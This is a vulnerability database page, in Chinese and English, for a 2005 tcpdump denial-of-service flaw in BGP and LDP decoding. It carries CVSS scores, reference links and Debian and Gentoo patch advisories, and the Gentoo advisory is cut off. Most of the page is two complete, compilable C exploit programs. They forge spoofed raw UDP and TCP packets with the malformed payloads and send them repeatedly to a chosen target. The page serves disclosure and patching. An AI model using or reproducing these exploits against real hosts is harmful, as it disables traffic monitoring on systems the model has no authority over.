CVE-2005-1279
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2013-08-19 00:40:49
NMCOEPS    

[原文]tcpdump 3.8.3 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted (1) BGP packet, which is not properly handled by RT_ROUTING_INFO, or (2) LDP packet, which is not properly handled by the ldp_print function.


[CNNVD]TCPDump LDP拒绝服务漏洞(CNNVD-200505-752)

        TCPDump是一款免费的网络分析程序,适用于多种Unix操作系统。
        TCPDump对LDP协议的解码存在漏洞,远程攻击者可能利用此漏洞对进行造成拒绝服务攻击

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9601tcpdump 3.8.3 and earlier allows remote attackers to cause a denial of service (infinite loop) via a crafted (1) BGP packet, which is not pr...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1279
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1279
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-752
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/396932
(VENDOR_ADVISORY)  BUGTRAQ  20050426 tcpdump[v3.8.x/v3.9.1]: ISIS, BGP, and LDP infinite loop DOS exploits.
http://www.redhat.com/support/errata/RHSA-2005-421.html
(UNKNOWN)  REDHAT  RHSA-2005:421
http://www.redhat.com/support/errata/RHSA-2005-417.html
(UNKNOWN)  REDHAT  RHSA-2005:417
http://www.securityfocus.com/bid/13389
(UNKNOWN)  BID  13389
http://www.securityfocus.com/archive/1/archive/1/430292/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:156139
http://www.debian.org/security/2005/dsa-850
(UNKNOWN)  DEBIAN  DSA-850
http://secunia.com/advisories/18146
(UNKNOWN)  SECUNIA  18146
http://secunia.com/advisories/17101
(UNKNOWN)  SECUNIA  17101
http://secunia.com/advisories/15125
(UNKNOWN)  SECUNIA  15125
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.60/SCOSA-2005.60.txt
(UNKNOWN)  SCO  SCOSA-2005.60

- 漏洞信息

TCPDump LDP拒绝服务漏洞
中危 其他
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        TCPDump是一款免费的网络分析程序,适用于多种Unix操作系统。
        TCPDump对LDP协议的解码存在漏洞,远程攻击者可能利用此漏洞对进行造成拒绝服务攻击

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.tcpdump.org

- 漏洞信息 (957)

Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit (EDBID:957)
linux dos
2005-04-26 Verified
0 vade79
N/A [点击下载]
/*[ tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS. ]********* 
 *                                                                *
 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-ldp-dos.c -o xtcpdump-ldp-dos                    *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (LDP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * LDP is UDP(/TCP), so no LDP service has to actually be running *
 * to abuse this issue, spoofed or not spoofed.  depending on the *
 * path the packet takes spoofed packets may be dropped(dropped   *
 * at your router most likely), in such a case non-spoofed        *
 * packets have the same effect, they just show your ip.          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen,        *
 * however most need the "-v" argument.                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define LDP_PORT 646
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct udph{
  unsigned short source;
  unsigned short dest;
  unsigned short len;
  unsigned short check;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed LDP data. (the bug) */
static char payload[]=
 "\x00\x01\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\x00\x00\xff\xff\xff\xff";

/* prototypes. (and sig_alarm) */
void ldp_nospoof(unsigned int);
void ldp_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS."
 "\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  if(nospoof)ldp_nospoof(daddr);
  else ldp_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) sends a (LDP) udp packet. */
void ldp_nospoof(unsigned int daddr){
 signed int sock;
 struct sockaddr_in sa;
 sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 if(sendto(sock,payload,sizeof(payload)-1,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<sizeof(payload)-1)
  printe("failed to send non-spoofed LDP packet.",1);
 close(sock);
 return;
}
/* (spoofed) generates and sends a (LDP) udp packet. */
void ldp_spoof(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct udph udp;
 struct sumh sum;
 /* create raw (UDP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_UDP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct udph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&udp,0,sizeof(struct udph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_UDP;
 ip.frag_off=64;
 udp.source=htons(random()%60000+1025);
 udp.dest=htons(LDP_PORT);
 udp.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* make sum/calc buffer for the udp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&udp,sizeof(struct udph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct udph),
 payload,sizeof(payload)-1);
 udp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct udph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&udp,sizeof(struct udph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct udph)),
 payload,sizeof(payload));
 /* send the malformed LDP packet. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<psize)
  printe("failed to send forged LDP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}

// milw0rm.com [2005-04-26]
		

- 漏洞信息 (958)

Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit (EDBID:958)
linux dos
2005-04-26 Verified
0 vade79
N/A [点击下载]
/*[ tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS. ]***** 
 *                                                                *
 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos                    *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos -D_USE_SYN         *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (BGP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * BGP is TCP, however the victim does not have to have the BGP   *
 * port(179) open to abuse the bug.  by sending a specially       *
 * crafted (spoofed) TCP(ACK,PUSH) packet to port 179 you can     *
 * trigger the infinite loop, however it depends on if the packet *
 * can make it out without being dropped.  in some situations the *
 * source host/ip used must be within your local subnet(or your   *
 * actual ip) for the (spoofed) packet to make it past your own   *
 * router.  if for some reason you think a (invalid) TCP(SYN)     *
 * packet is more likely to make it out, compile with the         *
 * -D_USE_SYN flag. (tcpdump will parse the BGP data even if it   *
 * is a TCP(SYN) packet)                                          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen.        *
 * however most need the "-v" argument, and a some need the       *
 * "-s" (snaplen) set to 88(non-spoofed is around 100, with the   *
 * ip options) or more.                                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define BGP_PORT 179
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct tcph{
 unsigned short source;
 unsigned short dest;
 unsigned int seq;
 unsigned int ack_seq;
#ifdef _USE_BIG_ENDIAN
 unsigned short doff:4,res1:4,cwr:1,ece:1,
 urg:1,ack:1,psh:1,rst:1,syn:1,fin:1;
#else
 unsigned short res1:4,doff:4,fin:1,syn:1,
 rst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;
#endif
 unsigned short window;
 unsigned short check;
 unsigned short urg_ptr;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed BGP data. (the bug) */
static char payload[]=
 /* shortened method. (34 bytes) */
 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00"
 "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01"
 "\x84\x00\x00\x00";
 /* original method, un-comment/swap if desired. (39 bytes) */
 /* "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" */
 /* "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00" */
 /* "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01" */
 /* "\x84\x00\x00\x20\x00\x00\x00\x00\x00"; */

/* prototypes. (and sig_alarm) */
void bgp_connect(unsigned int);
void bgp_inject(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop "
 "DOS.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(nospoof){
  printf("[*] target: %s\n",argv[1]);
  bgp_connect(daddr);
  printf("[*] done.\n");
 }
 else{
  if(!amt)printe("no packets?",1);
  printf("[*] destination\t: %s\n",argv[1]);
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
  printf("[*] amount\t: %u\n\n",amt);
  printf("[+] sending(packet = .): ");
  fflush(stdout);
  while(amt--){
   /* spice things up. */
   srandom(time(0)+amt);
   bgp_inject(daddr,saddr);
   printf(".");
   fflush(stdout);
   usleep(50000);
  }
  printf("\n\n[*] done.\n");
 }
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) generic connection. (port 179 on the */
/* victim has to be open for this to work) */
void bgp_connect(unsigned int daddr){
 signed int sock;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(BGP_PORT);
 s.sin_addr.s_addr=daddr;
 printf("[*] attempting to connect...\n");
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("(non-spoofed) BGP connection failed.",1);
 alarm(0);
 printf("[*] successfully connected.\n");
 printf("[*] sending malformed BGP data. (%u bytes)\n",
 sizeof(payload)-1);
 usleep(500000);
 write(sock,payload,sizeof(payload));
 usleep(500000);
 printf("[*] closing connection.\n\n");
 close(sock);
 return;
}
/* (spoofed) generates and sends an unestablished (BGP) */
/* TCP(ACK,PUSH) or TCP(SYN) packet. */
void bgp_inject(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct tcph tcp;
 struct sumh sum;
 /* create raw (TCP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(BGP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct tcph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&tcp,0,sizeof(struct tcph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.id=(random()%65535);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_TCP;
 ip.frag_off=64;
 tcp.seq=(random()%0xffffffff+1);
 tcp.source=htons(random()%60000+1025);
 tcp.dest=sa.sin_port;
 /* passing BGP data as ip options for the syn packet method */
 /* doesn't work as tcpdump doesnt process it as BGP data. */
 tcp.doff=5;
#ifdef _USE_SYN
 tcp.syn=1;
 tcp.window=htons(65535);
#else
 tcp.ack=1;
 tcp.psh=1;
 tcp.ack_seq=(random()%0xffffffff+1);
 tcp.window=htons(4096*(random()%2+1));
#endif
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct tcph)+sizeof(payload)-1);
 /* make sum/calc buffer for the tcp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&tcp,sizeof(struct tcph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct tcph),
 payload,sizeof(payload)-1);
 tcp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct tcph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&tcp,sizeof(struct tcph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct tcph)),
 payload,sizeof(payload));
 /* send the malformed BGP packet. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<psize)
  printe("failed to send forged BGP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}

// milw0rm.com [2005-04-26]
		

- 漏洞信息 (F40555)

Debian Linux Security Advisory 850-1 (PacketStormID:F40555)
2005-10-11 00:00:00
Debian  security.debian.org
advisory,denial of service
linux,debian
CVE-2005-1279
[点击下载]

Debian Security Advisory DSA 850-1 - Vade 79 discovered that the BGP dissector in tcpdump, a powerful tool for network monitoring and data acquisition, does not properly handle RT_ROUTING_INFO. A specially crafted BGP packet can cause a denial of service via an infinite loop.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 850-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 9th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tcpdump
Vulnerability  : infinite loop
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-1279

"Vade 79" discovered that the BGP dissector in tcpdump, a powerful
tool for network monitoring and data acquisition, does not properly
handle RT_ROUTING_INFO.  A specially crafted BGP packet can cause a
denial of service via an infinite loop.

For the old stable distribution (woody) this problem has been fixed in
version 3.6.2-2.9.

For the stable distribution (sarge) this problem has been fixed in
version 3.8.3-4.

For the unstable distribution (sid) this problem has been fixed in
version 3.8.3-4.

We recommend that you upgrade your tcpdump package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9.dsc
      Size/MD5 checksum:      587 fac8be69ffc0fc9e98f720df652c3b8b
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9.diff.gz
      Size/MD5 checksum:    14189 09abe4d2c22c16aad175edf0e2d1e4a2
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2.orig.tar.gz
      Size/MD5 checksum:   380635 6bc8da35f9eed4e675bfdf04ce312248

  Alpha architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_alpha.deb
      Size/MD5 checksum:   214820 9c3c9a0fb94f149144f4379c0f9b4071

  ARM architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_arm.deb
      Size/MD5 checksum:   180762 bad61479d23cad44448f7fb91a9d6355

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_i386.deb
      Size/MD5 checksum:   170594 4f94b2909aed2bc2a308cf08d2d16208

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_ia64.deb
      Size/MD5 checksum:   253760 9c75cf903731d747f95a90b25f0a5de1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_hppa.deb
      Size/MD5 checksum:   196882 61d38516880cae6a195120d09e866430

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_m68k.deb
      Size/MD5 checksum:   158494 a87ff72914ae89e87ad510993c162c8b

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_mips.deb
      Size/MD5 checksum:   189980 11df907857746a04ca58a8a71ff53242

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_mipsel.deb
      Size/MD5 checksum:   194374 6d8cf0ee59fc4da2b09dfde3cc1d74e8

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_powerpc.deb
      Size/MD5 checksum:   178012 3ad9b8f3a9df2732329ad98e3c156018

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_s390.deb
      Size/MD5 checksum:   175390 892a544d87e3de60b2888b77442334da

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.6.2-2.9_sparc.deb
      Size/MD5 checksum:   180826 0931640053a722312cd48ed47b2fbafd


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDSKNVW5ql+IAeqTIRAuloAKC41wzfQ33Crg0oFYuiQz4W/27hAQCbBhjZ
kYzu9XQYIFrFJOkcTIM+hPs=
=1KMn
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F38413)

Gentoo Linux Security Advisory 200505-6 (PacketStormID:F38413)
2005-07-02 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-1279,CVE-2005-1280
[点击下载]

Gentoo Linux Security Advisory GLSA 200505-06 - TCPDump improperly handles and decodes ISIS, BGP, LDP (CVE-2005-1279) and RSVP (CVE-2005-1280) packets. TCPDump might loop endlessly after receiving malformed packets. Versions less than 3.8.3-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200505-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: TCPDump: Decoding routines Denial of Service vulnerability
      Date: May 09, 2005
      Bugs: #90541
        ID: 200505-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A flaw in the decoding of network packets renders TCPDump vulnerable to
a remote Denial of Service attack.

Background
==========

TCPDump is a tool for network monitoring and data acquisition.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
